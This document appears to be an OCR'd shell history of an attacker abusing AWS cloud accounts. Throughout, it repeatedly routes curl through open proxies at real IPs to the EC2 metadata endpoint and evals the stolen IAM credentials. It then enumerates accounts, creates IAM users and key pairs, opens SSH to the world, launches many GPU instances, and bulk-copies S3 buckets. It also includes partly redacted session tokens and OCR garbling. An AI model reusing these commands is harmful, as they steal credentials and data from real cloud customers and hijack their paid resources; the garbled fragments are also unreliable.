fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4Nl9rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRkly0414Wupkc8Lih2tB0t9+ChCDG
Li2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n "Expiration":
"2019-04-06T07:37:04Z"\n* Connection #0 to host 52.28.26.86 left intact\n}' | awssession.she`
6069 eval `echo -e '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-06T01:24:59Z",\n "Type" :
                                               BRWD", \n "SecretAccessKev":
         ",\n "AccessKeyId" : "
                                     gEbe",\n "Token":
"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEQCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEQY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7//////8BEAAaDDkwOTQzNTQ1NzIwMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
Dy+FachI3kASvpwyuF4EjNdk/Qcq83Ae7Wsum8ueYaKcw87jZSAea+8gt2IyHAzb6WnQwCw+AnupLuePqfPEIYYM7Al7DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047JQlP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4Nl9rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRkly0414Wupkc8Lih2tB0t9+ChCDG
Lj2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n "Expiration":
```

```
"2019-04-06T07:37:04Z"\n* Connection #0 to host 52.28.26.86 left intact\n}' | awssession.sh`
6071 eval `echo -e '{\n "Code" · "Success" \n "LastUpdated" : "2019-04-06T01:24:59Z",\n "Type" :
                                               BRWD",\n "SecretAccessKev":
        ",\n "AccessKeyId" : "
                                    gEbe",\n "Token":
"AgoJb3JpZ2luX2VjEEIaDGV1LWNlbnRyYWwtMSJGMEOCIGawD1aJ12AhHHMzNYi2IETwnca61zGowdidI+ONSYMHAiBEOY6J+WhHw0oRUt
hABzg8UdjZ68pnmI3ElAZaPQxuPyrpAwj7/////8BEAAaDDkwOTQzNTQ1NzIwMyIMezwTTfX+av2tB2vbKr0DEXu3tf5Oyn4rFXGVw
Dy+FachI3kASvpwyuF4EiNdk/Ocg83Ae7Wsum8ueYaKcw87iZSAea+8gt2IvHAzb6WnOwCw+AnupLuePgfPEIYYM7A17DHxYKARkC+oARet
hntDu8KPTCXYKivnVjSCMKmr5hnOftgXV7yci/iUITP0Fqdz4J96itwCSw8047J0lP+aawEvAiGmPNZwxknjsoUn/WbBftWYE5ajsAkZGuj
O9nRvutqRlMQHnkOuOVEbGEZHBC6sdsrgVoB2NGZuUnI/NFfe49W/bFGZRr7eSiiTi11frjZG6zEGtzziIIGzJ/768QUWMaD0aRbBlc6dCM
cdDzPyxatzYty5eHUHZSF8tuvRGtf+aU8V4KDw83CEYZcRDDDi54mcjrWrEU/E6I1xxQCY8b/wERN82CGQOt00t8cP77JujKXa4j6CcE93u
fkFnvaB8KByrPxew0WfIGaFbdcl0uU2gXAyKp8O3Rrndm7laENgV8taPvxypB4xZlgEaBz1utKsfSB6mUJWZibNp88EXm4axZKwwAq7s0os
wWHx/eUpc0u2J4wggD6GfepmfIPOhGcEDt2+UWfjLjCUgKDlBTq1Ad34cr7mL+vp0gTvZaTIVWN2N2hQvKrG+uiIaQQJbergSJjXj2cm51R
mGIUIHd4N19rZZWqJGHPtWWk3nD+NK0CNiBFZ4bS5ia3tUMS8qNThffzkZUEHB+Lv5hh0CuiGDqkSWRkly0414Wupkc8Lih2tB0t9+ChCDG
Lj2ERGTxEJ1fAMxPeYyUFmn4OeKwSaxr5lgClum/t8CpqmqbbVRaeFr+NJk6GBCaeWXaJkvZLRO+hg/70=",\n"Expiration":
"2019-04-06T07:37:04Z"\n}' | awssession.sh
6074 aws
                               --region=us-west-2 --query
 6075
      aws
6084 aws
6085 aws sts
6086 aws sts help
6090 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://34.241.124.93:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6091 aws
6092 aws iam create-user --
6093 aws iam add-role-to-instance-profile --
6094 aws ec2 describe-stale-security-groups
6097 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://3.121.9.222:443
http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
6098 aws
                    get-key-pairs
                    get-key-pairs --region us-east-1
6099 aws
6100 aws
                    start-instance
6103 echo 'allocate-static-ip
                                                          delete-domain-entry
get-instance-access-details
                                             get-relational-database-parameters
                                                                                         \nattach-disk
```

```
delete-instance
                                                                             get-instance-metric-data
              get-relational-databases
                                                           \nattach-instances-to-load-balancer
delete-instance-snapshot
                                               get-instance-port-states
get-relational-database-snapshot
                                            \nattach-load-balancer-tls-certificate
                                                                                             delete-key-pair
                              get-instances
get-relational-database-snapshots
                                            \nattach-static-ip
delete-load-balancer
                                              get-instance-snapshot
                                                                                             get-static-ip
                            \nclose-instance-public-ports
delete-load-balancer-tls-certificate
                                              get-instance-snapshots
                                                                                             get-static-ips
                                                                             delete-relational-database
                            \ncopy-snapshot
              get-instance-state
                                                             import-key-pair
\ncreate-cloud-formation-stack
                                                delete-relational-database-snapshot
                                                                                               get-key-pair
                                is-vpc-peered
                                                                             \ncreate-disk
                detach-disk
                                                               get-key-pairs
open-instance-public-ports
                                            \ncreate-disk-from-snapshot
detach-instances-from-load-balancer
                                              get-load-balancer
                                                                                             peer-vpc
                            \ncreate-disk-snapshot
                                                                             detach-static-ip
              get-load-balancer-metric-data
                                                             put-instance-public-ports
                                                download-default-key-pair
\ncreate-domain
get-load-balancers
                                               reboot-instance
\ncreate-domain-entry
                                                 export-snapshot
get-load-balancer-tls-certificates
                                               reboot-relational-database
\ncreate-instances
                                                get-active-names
                                                                                               get-operation
                                release-static-ip
\ncreate-instances-from-snapshot
                                                 get-blueprints
get-operations
                                               start-instance
\ncreate-instance-snapshot
                                                get-bundles
get-operations-for-resource
                                              start-relational-database
                                                                                           \ncreate-key-pair
                              get-cloud-formation-stack-records
                                                                             get-regions
              stop-instance
                                                           \ncreate-load-balancer
                                               get-relational-database
get-disk
                                            \ncreate-load-balancer-tls-certificate
stop-relational-database
                                                                                             get-disks
                              get-relational-database-blueprints
                                                                             tag-resource
            \ncreate-relational-database
                                                             get-disk-snapshot
get-relational-database-bundles
                                               unpeer-vpc
                                                get-disk-snapshots
\ncreate-relational-database-from-snapshot
get-relational-database-events
                                               untag-resource
\ncreate-relational-database-snapshot
                                                get-domain
get-relational-database-log-events
                                                                                           \ndelete-disk
                                               update-domain-entry
```

```
get-domains
get-relational-database-log-streams
                                             update-load-balancer-attribute
                                               get-export-snapshot-records
\ndelete-disk-snapshot
get-relational-database-master-user-password update-relational-database
                                                                                         \ndelete-domain
                             get-instance
                                                                                      '| tr'''\n'|
get-relational-database-metric-data
                                             update-relational-database-parameters
grep "." | parallel -j100 aws
                                           --region us-east-1
6106 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://34.250.92.179:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh\n`
6107 aws iam create-user --user-name
                      describe-launch-configurations
6108 aws
6109 aws
                      enter-standby
6116 aws iam get-instance-profile
6117 aws iam get-instance-profile --instance-profile-name
6121 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.208.97.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6122 aws iam list-instance-profiles
                      describe-auto-scaling-groups
6123 aws
              describe-instances --region us-east-1 | less
6124 aws
6129 eval curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 http://107.23.74.110:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6144 aws s3 sync s3:/
6145 aws s3
s3://
6146 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://107.23.74.110:8181
6147 curl -vvv --fail -s -L --proxv-insecure -m 5 --connect-timeout 2 --proxv http://107.23.74.110:8181
6148 curl
 6149 curl -vvv -k --tail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
```

```
http://107.23.74.110:8181
6150 curl
6173 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[]
select(.service == "EC2") | .ip_prefix ' | parallel ./spool.sh
 6256 nano ~/.local/bin/awssession.sh
6310 mkdir awsscanner
6311 cd awsscanner
6339 echo '{\n _"Code" : "Success",\n "LastUpdated" : "2019-04-07T18:06:14Z",\n "Type" : "
                                                                                                     ",\n
                                OJ2U",\n "SecretAccessKey":
"AccessKeyId" : "
                                     BJ3",\n "Token":
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmQZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1NTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud10F8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7E0r7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZjiwAt3oXQNV4NFf2dCrGo6s7avut142wvLRrSovØvFFmK5J1RPnhxKVjiFeGloXeJSrP26rNfhe5uSØsKQW4W+dHWFb1P8Kz3q
bWMegOzOB1HG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
OgeNXpOCjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ4O+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7J04dw9DcLTqBG6R0htfZuCY/norM3xVzM0X3q0UF0rMBL9ZRfr01u0f2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWQriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmY0iEBgFOAQ1XoN
NXBKbppdfMPod5W+HKOD2PN7YVvaJ5YEvz214wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n "Expiration":
"2019-04-08T00:18:52Z"\n}' | awssession.sh
6340 aws ec2-describe-instances
6341 aws ec2 describe-instances --region us-east2
6342 aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 1 --image-id
      90d3 --subnet-id subnet-
                                   5b38 --associate-public-ip-address
ami-
6343 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 f32 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
6344 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 f32 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
6345 aws ec2 describe-key-pairs --region us-east-1
6347 aws ec2 create-key-pair --region us-east-1 --key-name default
6351 eval `echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-04-07T18:06:14Z",\n "Type" :
         ",\n "AccessKeyId" : "
                                               OJ2U",\n "SecretAccessKev":
                                    EBJ3",\n
                                              "Token" :
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmOZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
```

```
uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1NTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud10F8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7E0r7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZiiwAt3oXQNV4NFf2dCrGo6s7avut142wvLRrSov0vFFmK5JlRPnhxKVjiFeGloXeJSrP26rNfhe5uS0sKQW4W+dHWFb1P8Kz3q
bWMegOzOB1HG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
OqeNXpOCjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ4O+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7J04dw9DcLTqBG6ROhtfZuCY/norM3xVzMOX3qOUFOrMBL9ZRfrO1uOf2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWQriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmY0iEBgFOAQ1XoN
NXBKbppdfMPod5W+HKQD2PN7YVvaJ5YEvz2l4wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n "Expiration":
"2019-04-08T00:18:52Z"\n}' | awssession.sh
6352 eval `echo '{\n "Code" : "Success",\n
                                              "LastUpdated": "2019-04-07T18:06:14Z",\n "Type":
        :",\n "AccessKeyId" : "
                                               DJ2U",\n "SecretAccessKey" :
                                    EBJ3",\n
                                              "Token":
"AgoJb3JpZ2luX2VjEGoaDmFwLW5vcnRoZWFzdC0yIkgwRgIhAJhsIq+1iZTaUmQZygz1UTG7/pO/YYURyZHsuloXcdZuAiEA6RIC6Pg1xz
uUcGQ8iMQbcosHbsgpTWAxvY+XRkxmLw8q5AMIMxAAGgw3MTUxMjA5MTQ1NTMiDEPtiM0XzdWrhtK9VCrBA53vEp6Ouh0X1MGsje6JEBuW5
A4NmrjaiTEbJrKE6NQMpgjHWdE+4U8Ud1OF8DVrLAGgvIdm4gLBXcgjP6ePNkJf//wusYYx7EOr7Wlo8iIUE2542oF+HhIw3yw9b/H723IN
cd87x8MzZjiwAt3oXQNV4NFf2dCrGo6s7avut142wvLRrSov0vFFmK5J1RPnhxKVjiFeGloXeJSrP26rNfhe5uS0sKQW4W+dHWFb1P8Kz3q
bWMegOzOB1HG6rFfPC0N572HXToJ7x+02/SqJgP7jlaHuW3+DQHoMnjk7AH7iXu2sdnLlYph3LD76NvgImS79GmKyo2mNMjH2vmUO2+41pQ
OgeNXpOCjlsY+CoPMk3BISpHCgiBX3NwcPov1yicwh7wbwYDy7wZqqZcI2xd5NxA1MJ4O+CyvNsgfgXPL3nmAln7DahiYwoQVp2FTRxgVFS
AyAJT9HQGEHCmnCFCp1TGtA7Sb8e5XL0aiXttRvmUz3SV58i7WGAzrK860eKNA05S9eJ3AcsjnIQ4NGQoyt2wGDH4oqpjGu2jru1ym+/pge
TIlejJe7JO4dw9DcLTqBG6ROhtfZuCY/norM3xVzMOX3qOUFOrMBL9ZRfrO1uOf2Jhlr0k4z9la9bKEevvqNMiDr1TCw+SLcLdTUzk5q0rD
NKJK0MWOriw3T78ulNgN5ZhQ7Zp9/jFUckFGEdZ2uNIqfBCi14cGYpCWscgwMwp7o32gUeRmK88WfRUSCm4WZU/RpaPAmY0iEBgFOAQ1XoN
NXBKbppdfMPod5W+HKQD2PN7YVvaJ5YEvz2l4wuRVma83Wdx1c0f6sC8otwi/+o/mmz9vCY8rua8o=",\n "Expiration":
"2019-04-08T00:18:52Z"\n}' | awssession.sh `
6353 aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
        90d3 --subnet-id subnet- 6b38 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6354 aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
        90d3 --security-group-ids --associate-public-ip-address --instance-initiated-shutdown-behavior
terminate --key-name default
      aws ec2 run-instances --region us-east-1 --instance-type p3dn.24large --count 2 --image-id
ami-
        90d3 --security-group-ids sg-
                                        ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6356 aws ec2 run-instances --region us-east-1 --instance-type p3dn.x24large --count 2 --image-id
                                        ff32 --associate-public-ip-address
ami-
        90d3 --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
6357 aws ec2 run-instances --region us-east-1 --instance-type p3dn.24xlarge --count 2 --image-id
       90d3 --security-group-ids sg- ff32 --associate-public-ip-address
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
```

```
6358 aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-
       90d3 --security-group-ids sg- f32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6359 aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
       90d3 --security-group-ids sg-
                                      ff32 --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6360 aws ec2 run-instances --region_us-east-1 --instance-type p3.2xlarge --count 2 --image-id
       90d3 --security-group-ids sg-
                                      ff32 --associate-public-ip-address
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
6361 aws ec2 describe-instances --region us-east-2
6362 aws ec2 describe-instances --region eu-west-1 --region us-west-2 | jq -r '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
6370 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip prefix '
6371 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip prefix | []'
6372 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | .ip_prefix | .[]'
6373 curl --retry 2 -s --fail https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes | .[] |
select(.service == "EC2") | "\"" + .ip_prefix + "\", "'
6404 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://107.23.74.110:8181
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/
awssession.sh`
6408 aws ec2 describe-instances --region us-east-1
6411 aws ec2 create-key-pair --key-name default --region us-east-1
6415 aws ec2 authorize-security-group-ingress --group-id sg- 382d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
 6416 aws ec2 run-instances --region us-east-1 --instance-type p3dn.24xlarge --count 2 --image-id
ami- 90d3 --security-group-ids sg- 982d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6417 aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
ami-
       90d3 --security-group-ids sg-
                                      982d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
6418 aws ec2 run-instances --region us-east-1 --instance-type p3.8xlarge --count 2 --image-id
       --instance-initiated-shutdown-behavior terminate --key-name default
6419 aws ec2 run-instances --region us-east-1 --instance-type p3.2xlarge --count 2 --image-id
       90d3 --security-group-ids sg- 982d --associate-public-ip-address
ami-
```

```
--instance-initiated-shutdown-behavior terminate --key-name default
6437 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.5.71.131:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                      awssession.sh`
6439 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.33.123.102:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
6442 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.10.40.107:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6444 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.199.114.150:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6445 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.33.123.102:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials,
awssession.sh`
6446 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://52.41.202.37:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6447 aws --profile tokyo describe-instances --region us-east-1
6448 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000 http://169.254.169.254/latest/meta-data/iam/security-credentials
awssession.sh`
6451 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh`
6452 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://13.125.149.161:3000
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                       awssession.sh`
6458
6459 aws --profile
                                 describe-instances --region us-east-1
                                ec2 create-key-pair --region us-east-1 --key-name default
6460 aws --profile
                                ec2 describe-instances --region us-west-2
6461 aws --profile
                              describe-instances --region us-east-1
6463 aws --profile
6464 aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] |
```

```
.InstanceId'
                               Jescribe-instances --region us-east-1 | jq -r '.Reservations | .[] |
6465 aws --profile
.Instances | .[] | .InstanceId'
6466 aws --profile
                               terminate-instances --instance-ids i-
                                                                                 c924 i-
                                                                                                     3fa6
i-
              f586 i-
6467 aws --profile
                                                                                                     3fa6
                               terminate-instances --instance-ids i-
                                                                                 c924 i-
i.
                                   t3f3 --region us-east-1
              f586 i-
6468 aws ec2 describe-instances --region us-east-1 | jq -r '.Reservations | .[] | .Instances | .[] ' |
less
6469 aws --profile
                               describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
.Instances | .[] ' | less
                               describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
6470 aws --profile
.Instances | .[] '
                               describe-instances --region us-east-1 | jq -r '.Reservations | .[] |
6471 aws --profile
.Instances | .[] | .State'
6472 aws --profile
                               describe-key-pairs
6473 aws --profile
                               describe-key-pairs --region us-east-1
6474 aws --profile
                               describe-key-pairs --region ap-southeast-2
                               describe-key-pairs --region ap-southeast-1
6475 aws --profile
                               describe-key-pairs --region ap-northeast-1
6476 aws --profile
6477 aws --profile
                               describe-key-pairs --region ap-northeast-2
6478 aws --profile
                               list-users
                               describe-volumes --region us-east-1
6479 aws --profile
6488 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.211.134.22:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                            awssession.sh`
6522 aws --profile
                                    describe-instances
                                    describe-instances --region us-east-1
6523 aws --profile
 6524 aws --profile
                                    lescribe-instances --region us-east-1
6525 awscli
6526 aws
6527 aws configure
6529 aws --profile
                                 --region us-west-1 describe-instances
6530 aws --profile
                                 --region us-west-1 ec2 describe-instances
6531 aws --profile
                                 --region us-west-1 create-key-pair --key-name default
6532 aws --profile
                                 --region us-west-1 ec2 create-key-pair --key-name default
6535 aws --profile
                                 --region us-west-2 ec2 describe-security-groups
                                 --region us-east-1 ec2 describe-instances
6536 aws --profile
```

```
--region eu-west-2 ec2 describe-instances
6537 aws --profile
6538 aws --profile
                                 --region eu-west-2 ec2 create-key-pair --key-name default
                                 --region eu-west-2 ec2 describe-security-groups
6542 aws --profile
6543 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-
                 6eab --key-name default --associate-public-ip-address --security-group-ids sg-
                                                                                                    8356
--instance-shutdown-behavior terminate
6544 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
                6eab --key-name default --associate-public-ip-address --security-group-ids sg-
ami-
                                                                                                    8356
--instance-initiated-shutdown-behavior terminate
6545 aws --profile
                                    run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2
--image-id ami-
                            6eab --key-name default --associate-public-ip-address --security-group-ids
      8356 --instance-initiated-shutdown-behavior terminate
                                     run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2
6546 aws --profile
                            5eab --key-name default --associate-public-ip-address --security-group-ids
--image-id ami-
       8356 --instance-initiated-shutdown-behavior terminate
          aws scan/
6552
6562 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://13.238.78.174:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               l awssession.sh `
6563 curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.238.78.174:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh
6569 aws s3api
6570 aws s3api help
                                                                              S7HJ"
6571 aws sexport AWS SECRET ACCESS KEY="
6572 aws s3 cp s3:
6573 aws s3 cp s3:
6574 aws s3 cp s3:
6575 aws s3 cp s3:
6577 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='
                                                                                                '' ∖; mkdir
-p \"{\dim}\ '' \ '\&\&' \ cd \ ''\ '\&\&' \ aws \ s3 \ sync \ s3://{} .
6603 aws ec2 describe-instances --verbose
6604 aws ec2 describe-instances --debug
6606 aws --profile
                                escribe-instances
6607 aws --profile
                                escribe-instances --region us-west-2
6609 aws --profile
                                 --region us-west-2 ec2 describe-instances
                                 --region eu-north-1 create-key-pair --key-name default
6610 aws --profile
                                 --region eu-north-1 ec2 create-key-pair --key-name default
6611 aws --profile
```

```
--region eu-north-1 ec2 run-instances --instance-type t3.micro --count 1
6618 aws --profile
--image-id --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
6619 aws --profile
                                --region eu-north-1
                                                     run-instances --instance-type t3.micro --count 1
--image-id ami-
                   leac --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
6620 aws --profile
                                --region eu-north-1
                                                        describe-security-groups
6621 aws --profile
                                --region eu-north-1
                                                        run-instances --instance-type t3.micro --count 1
--image-id ami- 4eac --associate-public-ip-address --security-group-ids sg-
                                                                                 10cb
--instance-initiated-shutdown-behavior terminate --key-name default
6622 aws --profile
                                   egion eu-north-1 ec2 describe-instances
                                  authorize-security-group-ingress --group-id sg-
                                                                                    10cb --protocol tcp
6624 aws --profile
--port 22 --cidr 0.0.0.0/0 --region eu-north-1
6652 grep -r ami-id > ~/aws scan/success.log
6653 cat ../aws scan/scan for metadata.sh
6772 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
https://52.7.200.131:8443 http://169.254.169.254/latest/meta-data/iam/security-credentials
              | awssession.sh `
6775 eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy
http://54.254.248.28:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/
               | awssession.sh `
6776 aws ec2 describe-instances --region us-west-2 less
6777 aws ec2 create-key-pair --region us-east-1
6778 aws ec2 create-key-pair --region us-east-1 --key-name us-east-1
6781 aws ec2 describe-security-groups --region us-east-1
6782 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 4f2d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-east-1
6783 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 4f2d --protocol tcp --port 22 --cidr
0.0.0.0/0 -- region us-east-1
6784 aws ec2 run-instances --region us-east-1 --instance-type p3.16xlarge --count 2 --image-id
       90d3 --security-group-ids sg- 4f2d --associate-public-ip-address
--instance-initiated-shutdown-behavior terminate --key-name default
